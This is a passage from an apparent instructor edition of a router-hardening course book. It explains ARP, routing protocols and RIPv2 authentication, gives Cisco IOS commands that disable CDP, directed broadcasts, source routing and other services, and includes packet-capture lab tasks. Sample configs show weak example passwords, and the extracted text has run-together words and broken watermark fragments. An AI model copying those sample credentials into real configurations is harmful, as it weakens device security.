To take this concept a bit further, let’s look at the process of MAC address reso-lution if Node 2 is not on the local segment (see Figure 5-3). In order forcommunication to take place between Nodes 1 and 2, the following steps mustoccur:

1. Node 1 determines that it needs to communicate with Node 2. As with allTCP/IP communication, Node 1 ANDs its IP address with its subnet mask,then it ANDs Node 2’s IP address with the Node 1 subnet mask.

2. Node 1 compares the results of the two AND processes to determine if theyare the same—meaning that the nodes are on the same network—or

The IEEE (Institute ofElectrical and ElectronicEngineers) issues MACaddresses to networkhardware vendors to ensurethat MAC addresses remainunique.

Layer Two addresses areused to get data packetsfrom one local node toanother local node, whileLayer Three addresses areused to get data packetsfrom one network to anothernetwork.

Local ARP BroadcastBetween Two Nodes

Lesson 5: Routers and Access Control Lists 335

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 389: SCNP Hardening

different—meaning that the nodes are on different networks. In this example,the results are different, so Node 1 can conclude that Node 2 is situated on adifferent network than Node 1.

3. If Node 1’s TCP/IP stack is configured with a Default Gateway, Node 1 willuse ARP resolution for the Default Gateway address, as explained in the pre-vious example (because Node 1’s Default Gateway will most likely be onthe same network as Node 1), and store the Default Gateway address as theaddress to use for reaching Node 2.

Note:If a Default Gateway is not configured for Node 1, then Node 1 will not beable to communicate with Node 2. In fact, if a Default Gateway is not configuredand Node 1 attempts to ping Node 2, it should receive a message stating that thedestination host is unreachable. For a ping to be successful across a routed net-work such as the one in this example, Node 2 should also have an appropriateDefault Gateway in its IP configuration. If Node 2 exists but is not configured witha Default Gateway, and if Node 1 attempts to ping Node 2, Node 1 should receive amessage stating that the request timed out.

Figure 5-3: This example shows the process of a router returning the ARP request of aremote node.

These examples are geared towards TCP/IP as a protocol, and we will useTCP/IP throughout this lesson. IP addressing is the primary example of Networklayer addressing used today.

ARP Broadcast BetweenTwo Nodes on Different

Networks

336 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 390: SCNP Hardening

LAN-to-LAN Routing ProcessThe process of moving data from one host to another and from LAN to LAN isnot complex. In the example shown in Figure 5-4, there is one router connectingtwo networks. There are two hosts defined, one on either network, using TCP/IP.

Figure 5-4: Two networks connected by a single router.

From this diagram, you can see the networks are connected via a single router.Both interfaces are Ethernet interfaces, and the IP addresses are given. In thisexample, node 7 is trying to get a packet to node 10. Since the nodes are in dif-ferent networks, the packet will need to be routed to reach its goal.

An Ethernet packet will be generated at Node 7 with the IP source address as10.0.10.115 and the source MAC address as Node 7. The destination IP addresswill be 20.0.20.207 with the destination MAC address still unknown.

When the router hears the request for the MAC address of host 20.0.20.207, itreplies to node 7 with its MAC address. Node 7 then sends the packet to therouter with a destination IP address of 20.0.20.207 and the MAC address of theE0 interface of the router.

Once the router receives the packet, it in turn sends a broadcast for the MACaddress of 20.0.20.207. Node 10 responds to this request, and the router receivesthe response. A new packet is then generated by the router, addressed to IPaddress 20.0.20.207 from IP address 10.0.10.115 with the source MAC address ofthe router, and destination MAC address of Node 10. Node 10 receives the packetand responds, following the same steps.

Two Networks Connectedby a Single Router

Lesson 5: Routers and Access Control Lists 337

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 391: SCNP Hardening

LAN-to-WAN Routing ProcessThe LAN-to-WAN routing process is not much different than the previousexample—there are simply more steps involved and the packet may changeencapsulations along the way from Ethernet to something else and back toEthernet. In the example shown in Figure 5-5, there is a routed network with twoLANs connected via multiple routers in a WAN configuration.

Figure 5-5: Two end nodes connected over multiple routers in a WAN configuration.

Two Nodes Connected in aWAN Configuration

338 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 392: SCNP Hardening

For a packet to get from Node 7 to Node 10 in this configuration, there are sev-eral steps that must happen:

1. Node 7 creates a request for the MAC address of node 50.0.50.150.

2. The router connected to Network 10.0.10.0 sees this request, and realizes itis the path to the destination network. It replies to Node 7 with its MACaddress.

3. Node 7 creates a packet with the source IP address of 10.0.10.115 and thedestination IP address of 50.0.50.150 and a source MAC of Node 7 and des-tination MAC of the network 10.0.10.0 router.

4. As the local router receives the packet, the IP source and destination IPaddresses do not change. The encapsulation may change to fit the wire, PPPor Frame Relay for example.

5. The packet is sent from one router to another, each time the IP address doesnot change.

6. Once the packet reaches the router for segment 50.0.50.0, the encapsulationis removed, and you are left with an Ethernet packet with source IP address10.0.10.115 and destination IP address 50.0.50.150, and source MAC of thelocal E0 interface of the local router and destination MAC address of Node10.

TASK 5B-1Performing IP and MAC Analysis

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. On your course CD-ROM, navigate to the \085545\Data\Captures folder,and open the ping-arp-mac.cap file. The file should open in NetworkMonitor.

2. Quickly scroll through the main capture, noting the frames and theirfunctions. You will see it is a capture of an initial ARP process, then twoconsecutive pings (Echo and Echo:Reply) packets.

3. Expand Frame Four.

4. Record the source and destination IP addresses and the source and des-tination MAC addresses here:

Source IP address: 172.16.10.1.

Destination IP address: 172.17.10.1.

Source MAC address: 00 D0 09 7F 0D 73.

Destination MAC address: 00 00 0C 8D B8 54.

If you need to, expand IP and Ethernet so that you can see the addresses.

5. Expand Frame Five, and record those IP and MAC addresses as well.

Lesson 5: Routers and Access Control Lists 339

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 393: SCNP Hardening

Source IP address: 172.17.10.1.

Destination IP address: 172.16.10.1.

Source MAC address: 00 00 0C 8D B8 54.

Destination MAC address: 00 D0 09 7F 0D 73.

6. Observe that, when pinging 172.17.10.1 from 172.16.10.1, the destinationMAC address is 00000C8DB854.

7. Examine the exchanges in frames 6 and 7, 8 and 9, and 10 and 11 to seethe ping process complete.

8. Expand Frame Twelve, and record those IP and MAC addresses as well.

Source IP address: 172.16.10.1.

Destination IP address: 172.18.10.1.

Source MAC address: 00 D0 09 7F 0D 73.

Destination MAC address: 00 00 0C 8D B8 54.

9. Expand Frame Thirteen, and record those IP and MAC addresses aswell.

Source IP address: 172.18.10.1.

Destination IP address: 172.16.10.1.

Source MAC address: 00 00 0C 8D B8 54.

Destination MAC address: 00 D0 09 7F 0D 73.

10. Observe that when pinging 172.18.10.1 from 172.16.10.1, the destinationMAC address is 00000C8DB854.

11. Examine the exchanges in frames 14 and 15, 16 and 17, and 18 and 19to see the ping process complete.

12. Leave Network Monitor open.

The Routing ProcessFigure 5-6 shows a complex network, with many possible paths for the data totake across the network. The routers will have to communicate with each other inorder to determine the path for the given situation.

Potential Data Paths

340 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 394: SCNP Hardening

Figure 5-6: Potential paths that data can take to get from one node to another.

In order for the routers to exchange their data, they must have mutual paths ofcommunication. These paths are the actual connections between the routers. Byusing logical addressing, the routers are able to have defined networks to transmitdata on. The logical addressing minimizes the use of broadcasting, with the endresult being more bandwidth for data transmission. In Figure 5-7, each segmentwith a letter is a unique Layer Three network segment.

Logical Network Addressing

Lesson 5: Routers and Access Control Lists 341

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 395: SCNP Hardening

Figure 5-7: Logical network addressing used in an internetwork.

The routers will use the information about the paths to which they are connected,including the type of connection and available bandwidth, to determine the routesfor data to take. For example, the routers might now say for a packet to get fromnetwork A to network N that the packet should take network A to network B tonetwork D to network H to network J to network K to network M to network N.There are many times when the fastest route is not a straight path!

Static and Dynamic RoutingIn order for the router to be able to make decisions on where data should go, itneeds to consult its routing table. The routing table is the list of available net-works and the paths to reach those networks. (Routing tables will be discussed indetail in the next topic.)

Every time a packet reaches a router, the router needs to review the routing tableto determine the appropriate path for the packet. The router must be aware of theother potential networks and the way to reach these networks.

342 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 396: SCNP Hardening

Static RoutesThe creation of these paths can happen either dynamically (automatically) orstatically (manually). The first of these two concepts, static routing, is definedhere.

A static route is a route that has been manually entered into the router to definethe path to the remote network. Although its use is not desirable for every situa-tion, static routing has many advantages, such as:

• Precise control over the routes data will take across the network.

• Easy to configure in small networks.

• Reduced bandwidth use, due to no excessive router traffic.

• Reduced load on the routers, due to no need to make complex routingcalculations.

Figure 5-8 shows a simple network configuration with two routers and theirdefined networks.

Figure 5-8: Two routers, Finance and Marketing, and the networks they connect.

The configuration fragments for the static routes of the above routers look likethe following:

MarketingRouter#config terminalMarketingRouter(config)#ip route 10.0.10.0 255.255.255.020.0.20.1MarketingRouter(config-line)#^ZMarketingRouter#

FinanceRouter#config terminalFinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2FinanceRouter(config-line)#^ZFinanceRouter#

Dynamic RoutesFrom the previous example, you can see that the command syntax and time toenter the static routes is not complex and will not take a lot of time. However,the previous example is a very small simple network, and it is because of its sim-plicity that static routes will work.

Benefits of Static Routing

Sample Network for StaticRouting

Lesson 5: Routers and Access Control Lists 343

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 397: SCNP Hardening

When the networks become more complex, static routing is not always a reason-able option. If there were a dozen routers, for example, each connected to severalnetworks, static routing would become much more complex.

This is where dynamic routing enters the equation. Dynamic routing protocolscan change the configuration of the network when a link goes down. Dynamicrouting protocols can converge to be sure that all routers have a consistent viewof the network. And, dynamic routing protocols have the means to calculate thebest path through an internetwork.

Dynamic routing protocols use mathematical algorithms to determine routes andcommunicate with one another. These same routers exchange their information atdefined intervals, and these updates are used to make decisions on routes to takeand reconfiguration, when required.

Because the routers are exchanging this data frequently, they are able to changepaths and update as needed. This flexibility is what makes dynamic routing proto-cols so desirable. If a router goes down somewhere in the network, the remainingrouters will reconfigure and find a way for the data to reach the other side of thenetwork. An example of this is shown in Figure 5-9.

Figure 5-9: There are several routers and multiple paths data can take across thisinternetwork.

Multiple Data Paths

344 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 398: SCNP Hardening

In the event that Finance Router 2 goes offline, and these routers are usingdynamic routing, the other routers will reconfigure themselves to use only theother Finance Router. When the offline router comes back online, the other rout-ers in the network will reconfigure themselves accordingly.

Comparing Routed Protocols and Routing ProtocolsOne area where people tend to have confusion when dealing with routers is thedifference between routed protocols and routing protocols. They are distinctlydifferent. In this section, you will learn to differentiate between the two and drawthe boundaries clearly around them so that you can easily and quickly identifyone or the other.

What are Routed Protocols?For a protocol to be considered a routed protocol, it must have the followingcharacteristics:

• It must contain Network-layer addressing information.

• It must have a method of locating a single host on a given network.

Routed protocols are those that have the given information so that user data mayhave an addressing method to use in the transportation of data between andacross networks. The routed protocols have enough internal information to definethe structure and function of various fields inside a given packet.

The most common routed protocol of today (and of the last decade) is theInternet Protocol, or IP. Other routed protocols are Novell’s IPX/SPX (Microsoft’sversion of IPX/SPX is NWLink), and AppleTalk. TCP/IP, IXP/SPX, andAppleTalk all allow for addressing at the Network layer of the OSI model.

What are Routing Protocols?While a routed protocol is used to carry data from one host to another, a routingprotocol is used to carry data from one network to another, across multiplerouters. The routing protocol is also the method of transmitting the routingupdates and messages between routers.

Routers will use their assigned routing protocols to create, maintain, andexchange routing data. The routers can use the same routing protocols to actuallyforward the data packets from one network to another, including the decisions onwhich path is the best path to take for the data.

These routing protocols can also be used by routers to learn the status and con-figurations of networks they are not directly connected to. In addition to learningabout other remote networks, the routers will use their routing protocols to tellremote routers about networks that the remote router is not directly connected to.

Regardless of the routing protocol chosen, the routers must have consistent andopen communication between each other in order to maintain a reliable picture,or map, of the network. It is this map of the network that all the routers will useto assist in forwarding data packets from network to network.

Some examples of routing protocols are RIP (Routing Information Protocol),IGRP (Interior Gateway Routing Protocol), and OSPF (Open Shortest Path First).

Whether the protocol used is RIP, IGRP, or OSPF, it is important to consider thatthere is no actual end-user data carried by the routing protocol messages. Theuser data is carried by the routed protocol.

Lesson 5: Routers and Access Control Lists 345

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 399: SCNP Hardening

The Routing ProtocolsThe last area to cover in this topic is the actual protocols themselves. Here, wewill discuss the common types of protocols, and look at some examples of theprotocols in action. The two common types of protocols are Distance Vector andLink-State.

Regardless of whether the protocol is Distance Vector or Link-State, for dynamicrouting to function, two critical router functions must exist:

• An updated and consistent routing table.

• Scheduled updates between routers.

For the routing protocols to perform these two critical processes, they must con-form to a given set of rules. These rules are part of the operation of the routingprotocol. Examples of what rules these protocols can define include:

• The frequency of updates between routers.

• The amount of data contained in the updates.

• The process of finding proper recipients of the router data.

Calculation of the different data paths, and ultimately choosing the most efficientone based on the given protocol, requires a defined formula. The formula in thecase of routers is known as a routing algorithm.

The routing algorithm is responsible for the actual calculation on determining thepath the data will take as it moves throughout the network. To make this calcula-tion, the algorithm must use certain variables to create what is known as a metric.The metric is then what is used in path determination.

Some of the variables that are used to crate the overall metric of a given path are:

• Hop Count—This is the number of routers that a data packet must gothrough to reach its destination. The formula is that the lower the number ofhops, the lower the overall data has to travel, and therefore is the better path.

• Cost—The cost of a link can be defined by the administrator or calculatedby the router. Generally the lower the cost, the faster the route.

• Bandwidth—This variable is defined by the overall bandwidth that the linkprovides.

• MTU (Maximum Transmission Unit)—The MTU is the largest message size(in octets) that a link will route.

• Load—This variable is based on the amount of work the CPU has to per-form, and the number of packets the CPU must analyze and makecalculations on.

Regardless of the routing protocol chosen, there is no single rule for selecting thebest protocol based on its algorithm. The routing protocol must change to adaptto the network in the event there are network changes, and both Distance Vectorand Link-State have this ability. When the routers change their tables based onthis update information from the routing protocol, this is called convergence.When all routers have the same view of the network, the network is converged.

It is the goal of all routing protocols to have fast convergence, so that the routersmaintain a consistent view of the routes available to network segments, and donot use incorrect data to make routing decisions.

metric:A random variable x

representing a quantitativemeasure accumulated over a

period.

346 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 400: SCNP Hardening

Distance Vector RoutingDistance Vector routing calculates the distance to a given network segment andthe direction (or vector) required to reach the segment. The algorithm of DistanceVector (Bellman-Ford) is designed to pass the routing table from neighbor toneighbor. The passing of the routing table is called the update between routers. Inthe event there is a topology change, as a router going offline, an update will besent immediately from one router to another.

Figure 5-10: Routers passing the routing table.

In Distance Vector routing, the routing table is passed between routers along theshared segments. In Figure 5-10, Router A and Router B will share their routingtables over the segment between them, out Interface E2 of Router A and out ofInterface E0 of Router B.

When the routers receive an update, they add any new information on how to getto new routes, or better paths (lower hop counts) to known routes. The algorithmadds one hop to the hop count for every hop that must be crossed to reach thedestination. Figure 5-11 shows a basic routing table with hop count included.

Figure 5-11: A routing table with interfaces defined and hop counts.

In this example, the routing table has been created, and convergence has beenachieved. Both routers have a consistent view of the network, and the routingtables define the path to the networks and the interface to forward packets out toreach the required destinations.

topology:The map or plan of thenetwork. The physicaltopology describes how thewires or cables are laid out,and the logical or electricaltopology describes how theinformation flows.

Routers Passing theRouting Table

Routing Table with HopCounts

Lesson 5: Routers and Access Control Lists 347

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 401: SCNP Hardening

Link-State RoutingWhere Distance Vector routing uses hop counts to make the decisions in the rout-ing table on path determination, Link-State routing uses a more complex metricsystem. In Link-State routing, all routers maintain a consistent view of the net-work, as they do in Distance Vector routing, but they also are all aware of thecomplete network topology.

The Link-State routers know each network segment, and the different options forreaching each segment. Convergence is just as critical in Link-State routing, andin order to have a converged network, there are steps that must be followed. Fig-ure 5-12 shows a complex network, and after the diagram, the steps forconvergence will be outlined.

Figure 5-12: In this complex network, 7 routers and 14 network segments are defined.

The steps for network convergence are as follows:

1. The routers identify the routers that are their direct neighbors. For example,Router 3 will identify Router 6 and Router 4 as neighbors.

2. The routers send LSP (Link State Packets) to the network. The LSPs containdata on which networks the router can reach. For example, Router 7 wouldsend LSPs indicating that Router 7 is connected to segments 10.0.0.0, 11.0.0.0, 12.0.0.0, and 14.0.0.0.

3. The routers in the network accept all the LSPs and build a topology databaseof the network. The LSPs from all routers are used to build this consistentview.

4. The SPF (Shortest Path First) algorithm is used to determine the accessibilityof each network and the shortest path between networks. The SPF algorithm

Sample Network for Link-State Routing

348 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 402: SCNP Hardening

is executed on all routers, so that they all end up with the same topologyview of the network. Each router knows the best path to every segment.

5. The router uses the SPF calculations to determine the best (shortest) path forreaching each destination network on the internetwork.

Common ProtocolsHere is a quick list of common routing protocols used on Cisco routers:

• RIP (Routing Information Protocol) is a Distance-Vector protocol that useshop count as its metric.

• IGRP (Interior Gateway Routing Protocol) is a routing protocol that uses acombined metric for routing decisions.

• EIGRP (Enhanced Interior Gateway Routing Protocol) is an enhanced ver-sion of IGRP that combines properties of Link-State and Distance Vectorprotocols.

• OSPF (Open Shortest Path First) is a Link-State protocol that commonlyreplaces RIP in growing internetworks.

• BGP (Border Gateway Protocol) is an interdomain routing protocol oftenused by Internet Service Providers.

• RTMP (Routing Table Maintenance Protocol) is Apple’s routing protocol.RTMP routers dynamically update topology changes in the network.

Administrative DistancesAs the router has the ability to use static routes, dynamic routes, and multipleprotocols, the ability to see the current routing table becomes even more criticalas the network’s complexity increases.

There is a function in the router called administrative distance. The administrativedistance function has one obvious use, and that is managing when two or moremethods in the router are aware of a path to a destination. For example, if youentered a static route on how to get to a location, then RIP identified a route tothat location, which route should the router use?

This is where the administrative distance comes into play. The lower a value, thehigher the level of trust the router places in that route. Some default administra-tive distances are listed in the following table.

Route Type DistanceDirectly connected interface 0Static route 1IGRP route 100OSPF route 110RIP route 120

Therefore, if you had a static route and a RIP route, the static route would be thepreferred route that the router uses. When viewing the routing table, not only willyou be shown the current routes to destination networks, but you will also see themethod used. The following configuration fragments show a portion of the rout-ing tables for three routers in a network:

Routing Protocols

Default AdministrativeDistances

Lesson 5: Routers and Access Control Lists 349

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 403: SCNP Hardening

LEFT#show ip routeR 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1C 192.168.20.0/24 is directly connected, Serial1C 172.16.0.0/16 is directly connected, Ethernet0R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1

CENTER#show ip routeC 192.168.10.0/24 is directly connected, Serial1C 192.168.20.0/24 is directly connected, Serial0R 172.16.0.0/16 [120/1] via 192.168.20.1, 00:00:13, Serial0C 172.17.0.0/16 is directly connected, Ethernet0R 172.18.0.0/16 [120/1] via 192.168.10.1, 00:00:18, Serial1

RIGHTt#show ip routeC 192.168.10.0/24 is directly connected, Serial0R 192.168.20.0/24 [120/1] via 192.168.10.2, 00:00:20, Serial0R 172.16.0.0/16 [120/2] via 192.168.10.2, 00:00:20, Serial0R 172.17.0.0/16 [120/1] via 192.168.10.2, 00:00:20, Serial0C 172.18.0.0/16 is directly connected, Ethernet0

In these fragments, you can identify the routes on each router. You can also iden-tify the routes that are directly connected and the routes that are using RIP. Theway that you identify this is by the letter in front of each route. For example, inthese examples, all routes with a letter C are connected interfaces. Routes with anR are using RIP. If a route had been input statically, it would have an S in frontof it.

For the RIP routes shown, note that the number 120 is displayed in brackets afterthe route. The 120 is an indicator of the administrative distance of this route.(The number following the slash is the hop count.)

RIPRIP, or the Routing Information Protocol, is one of the most straightforward rout-ing protocols that can be implemented. It also has no significant security, isbroadcast-based, and is noisy.

RIP functions by informing neighboring routers of the routers that the currentrouter can reach. The current routes are created during the simple configurationprocess of setting up RIP in the router.

The following configuration fragments show the configuration of RIP on threerouters, LEFT, RIGHT, and CENTER:

LEFT#configure terminalLEFT(config)#router ripLEFT(config-router)#network 172.16.0.0LEFT(config-router)#network 192.168.10.0LEFT(config-router)^ZLEFT#

RIGHT#configure terminalRIGHT(config)#router ripRIGHT(config-router)#network 172.18.0.0

350 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 404: SCNP Hardening

RIGHT(config-router)#network 192.168.20.0RIGHT(config-router)^ZRIGHT#

CENTER#configure terminalCENTER(config)#router ripCENTER(config-router)#network 172.17.0.0CENTER(config-router)#network 192.168.10.0CENTER(config-router)#network 192.168.20.0CENTER(config-router)^ZCENTER#

In these fragments, RIP routing has been configured with the networks that eachrouter can reach. For example, the LEFT router will announce that if there is apacket destined for network 172.16.0.0, then the other routers should send it tothe LEFT router.

Because RIP is broadcast-based, any host on a segment where RIP broadcasts aresent can receive the update. Only the router has a legitimate routing function, butan attacker can learn valuable information, such as the configuration and address-ing of a network.

TASK 5B-2Viewing a RIP Capture

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Network Monitor is running.

1. Open rip update.cap, another capture file located on your course CD-ROM,in the \085545\Data\Captures folder.

2. Expand frame one, and observe the contents of the packet.

3. Look for the destination address of the packet. Find the IP and MACdestination addresses.

4. Observe the source address. You can conclude that this is likely the sourceaddress of a router in the network.

5. Expand the RIP portion of the frame capture.

6. Examine the network details sent in the packet. Even though you are arandom user on the network, you have captured the packet and are able tolearn quite a few things about the network in a very short amount of time.

RIPv2In order to address some of the issues associated with RIP, RIPv2 was introducedas a routing protocol. A security advantage was the ability to require and useauthentication for RIP updates. From a networking perspective, the configurationis very similar to RIPv1, as shown previously. The following configuration frag-ment shows the same three routers configured to use RIPv2 instead of RIPv1:

Lesson 5: Routers and Access Control Lists 351

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 405: SCNP Hardening

LEFT#configure terminalLEFT(config)#router ripLEFT(config-router)#version 2LEFT(config-router)#network 172.16.0.0LEFT(config-router)#network 192.168.10.0LEFT(config-router)^ZLEFT#

RIGHT#configure terminalRIGHT(config)#router ripRIGHT(config-router)#version 2RIGHT(config-router)#network 172.18.0.0RIGHT(config-router)#network 192.168.20.0RIGHT(config-router)^ZRIGHT#

CENTER#configure terminalCENTER(config)#router ripCENTER(config-router)#version 2CENTER(config-router)#network 172.17.0.0CENTER(config-router)#network 192.168.10.0CENTER(config-router)#network 192.168.20.0CENTER(config-router)^ZCENTER#

The authentication used is a key and MD5. The following configuration fragmentshows the setup of RIPv2 authentication. In this fragment, first the router is toldthat RIP authentication is required, then the key (the word “strongpassword”) iscreated.

Router#configure terminalRouter(config)#interface ethernet0Router(config-if)#ip rip authentication key-chain 3Router(config-if)#ip rip authentication mode md5Router(config-if)#exitRouter(config)# interface serial0Router(config-if)#ip rip authentication key-chain 3Router(config-if)#ip rip authentication mode md5Router(config-if)#exitRouter(config)# interface serial1Router(config-if)#ip rip authentication key-chain 3Router(config-if)#ip rip authentication mode md5Router(config-if)#^ZRouter#configure terminalRouter(config)#key chain 3Router(config-keychain)#key 1Router(config-keychain-key)#key-string strongpasswordRouter(config-keychain-key)#^ZRouter#

All routers that will exchange routing updates on the same network must use thesame configuration, so the authentication will match. Once the router is config-ured, if you were to enter the show running-config command, you wouldget the following new pieces in the output:

352 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 406: SCNP Hardening

enable secret 5 $1$v13S$Nk8zY5NcYor5VvAfcfZCn0enable password 2501!!key chain 3key 1key-string strongpassword

!interface Ethernet0ip address 172.16.0.1 255.255.0.0ip rip authentication mode md5ip rip authentication key-chain 3no mop enabledinterface Serial0no ip addressshutdown

TASK 5B-3Viewing a RIPv2 Capture

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Network Monitor is running.

1. Open ripv2withAuthentication.cap, another capture file located on yourcourse CD-ROM, in the \085545\Data\Captures folder.

2. Expand frame one, and observe the contents of the packet.

3. Look for the destination address of the packet. Find the IP and MACdestination addresses.

4. Observe the source address. You can conclude that this is likely the sourceaddress of a router in the network.

5. Expand the RIP portion of the frame capture.

6. Examine the network details sent in the packet.

7. Observe the addition of the Authentication portion of the capture andthe additional fields not present in the RIPv1 packet.

8. Close Network Monitor.

Lesson 5: Routers and Access Control Lists 353

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 407: SCNP Hardening

Topic 5CRemoving Protocols and ServicesThe fundamental concept of hardening the router is no different than hardeningLinux or Windows. You must remove all of the protocols and services that areunused. You must configure the required protocols and services so that they aresecured for access. In this topic, you will look at removing many of the protocolsand services that are often not used on a router and continue to harden thedevice.

CDPThe Cisco Discovery Protocol (CDP) is a protocol used by Cisco routers toexchange information, such as platform information and status, with each other.In general, CDP can be a useful thing to use when troubleshooting in a simpleenvironment. Unfortunately, like most things that can make our lives as adminis-trators a little easier, CDP can make an attacker’s job a little easier because itgives out important information such as the IOS version that the router isrunning. And, of course, knowing what IOS version is running makes an attack-er’s job much easier since he or she will have a much better idea of what exploitswill work against such a target.

In the following configuration fragment, you can see that turning off CDP for theentire router is not a complex set of commands—only two commands arerequired:

Router#config terminalRouter(config)#no cdp runRouter(config)#^ZRouter#

However, it may be desirable to stop CDP only on those interfaces that are notconnected directly to another router. Perhaps there is only a direct link betweentwo serial interfaces, and you want to allow CDP to run there, but not on theinternal Ethernet network. In the following configuration fragment, CDP is dis-abled just for the Ethernet interface. Note that the only addition is the defining ofthe interface, and the command is no cdp enable, instead of no cdp run:

Router#config terminalRouter(config)#interface Ethernet 0Router(config-if)#no cdp enableRouter(config-if)#^ZRouter#

354 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 408: SCNP Hardening

TASK 5C-1Turning Off CDP

1. Create the configuration fragment that you would use for turning offCDP on Ethernet 0, Ethernet 1, and Serial 1.

Router#config terminalRouter(config)#interface Ethernet 0Router(config-if)#no cdp enableRouter(config-if)#interface Ethernet 1Router(config-if)#no cdp enableRouter(config-if)#interface Serial 1Router(config-if)#no cdp enableRouter(config-if)#^ZRouter#

ICMPICMP provides, among other functions, the ability to use the often-required pingand traceroute commands. However, ICMP has become one of the most misusedof all protocols. DoS and DDoS attacks use ICMP, and more and more attackstake advantage of this function of the network. In this section, only a fewexamples of hardening ICMP are discussed.

ICMP Directed BroadcastSmurf is an attack that takes advantage of ICMP. Specifically, what Smurf does isto get many machines to flood a single host with ICMP packets, effectively shut-ting down that host. The way this attack works is to ping an entire network, usinga spoofed IP address. When every host of the network responds to the IP address,that machine has been attacked. This can easily lead to hundreds of machinesresponding to a host simultaneously.

The following configuration fragment shows the disabling of ICMP directedbroadcasts on the Serial 1, Serial 0, and Ethernet 0 interfaces. To protect fullyagainst this attack, you should turn off broadcasts like this on all interfaces.

Router#config terminalRouter(config)#interface Ethernet 0Router(config-if)#no ip directed broadcastRouter(config)#interface Serial 0Router(config-if)#no ip directed broadcastRouter(config)#interface Serial 1Router(config-if)#no ip directed broadcastRouter(config-if)#^ZRouter#

ICMP UnreachableAnother very common attack is for a potential intruder to scan your system(s)looking for services that are open and that can be exploited. It is common to useICMP to perform these scans of systems. If you remove the ICMP Unreachablemessage, be aware that your system will not respond to desired unreachable mes-

traceroute:An operation of sendingtrace packets for determininginformation; traces the routeof UDP packets for the localhost to a remote host.Normally traceroute displaysthe time and location of theroute taken to reach itsdestination.

Lesson 5: Routers and Access Control Lists 355

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 409: SCNP Hardening

sages, such as when your internal users legitimately need them, such as duringtimeouts. The following configuration fragment shows the disabling of ICMPUnreachable messages on the Serial 0 interface. To remove ICMP Unreachablemessages on the entire router, this command needs to be entered for eachinterface.

Router#config terminalRouter(config)#interface Serial 0Router(config-if)#no ip unreachablesRouter(config-if)#^ZRouter

TASK 5C-2Hardening ICMP

1. Create the configuration fragment that you would use to disable ICMPDirected Broadcasts and ICMP Unreachable messages on the entirerouter, which has the Ethernet 0, Serial 0, and Serial 1 interfaces.

Router#config terminalRouter(config)#interface Ethernet 0Router(config-if)#no ip directed broadcastRouter(config-if)#no ip unreachablesRouter(config)#interface Serial 0Router(config-if)#no ip directed broadcastRouter(config-if)#no ip unreachablesRouter(config)#interface Serial 1Router(config-if)#no ip directed broadcastRouter(config-if)#no ip unreachablesRouter(config-if)#^ZRouter#

Source RoutingA feature that was added to routers to increase the control administrators had overthe network was source routing. This feature has become a vulnerability thatattackers now use. Source routing is used to allow a packet to dictate the path itshould take through a routed network. This packet does not follow the routingtables as designated by the routing protocols. Doing so may allow an attacker tobypass critical systems, such as a firewall or an IDS. In most situations, there isno need for source routing to be allowed on any router. The configuration frag-ment that follows shows the disabling of the source routing service:

Router#config terminalRouter(config)#no ip source-routeRouter(config)#^ZRouter#

356 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 410: SCNP Hardening

Small ServicesTCP and UDP small services are enabled on some routers by default (generallyIOS 11.3 and previous versions). Small services are not often used anymore andinclude echo, discard, daytime, and chargen. On most routers, be sure to disablethese services. The configuration fragment that follows shows the disabling ofsmall services for both TCP and UDP:

Router#config terminalRouter(config)#no service tcp-small-serversRouter(config)#no service udp-small-serversRouter(config)#^ZRouter#

FingerFinger is another older service that is rarely used in modern networks. The Fingerservice is used to find information about users who are logged into a router. Onolder versions of the IOS (11.2 and older), Finger is disabled by using theno service finger command. On newer versions of the IOS (11.3 andnewer), Finger is disabled by using the no ip finger command. In the fol-lowing code, the first configuration fragment shows the removal of the Fingerservice from an older router, and the second fragment shows the removal of theFinger service from a newer router:

Router#config terminalRouter(config)#no service fingerRouter(config)#^ZRouter#

Router#config terminalRouter(config)#no ip fingerRouter(config)#^ZRouter#

Small services are alsoknown as small servers.

Lesson 5: Routers and Access Control Lists 357

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 411: SCNP Hardening

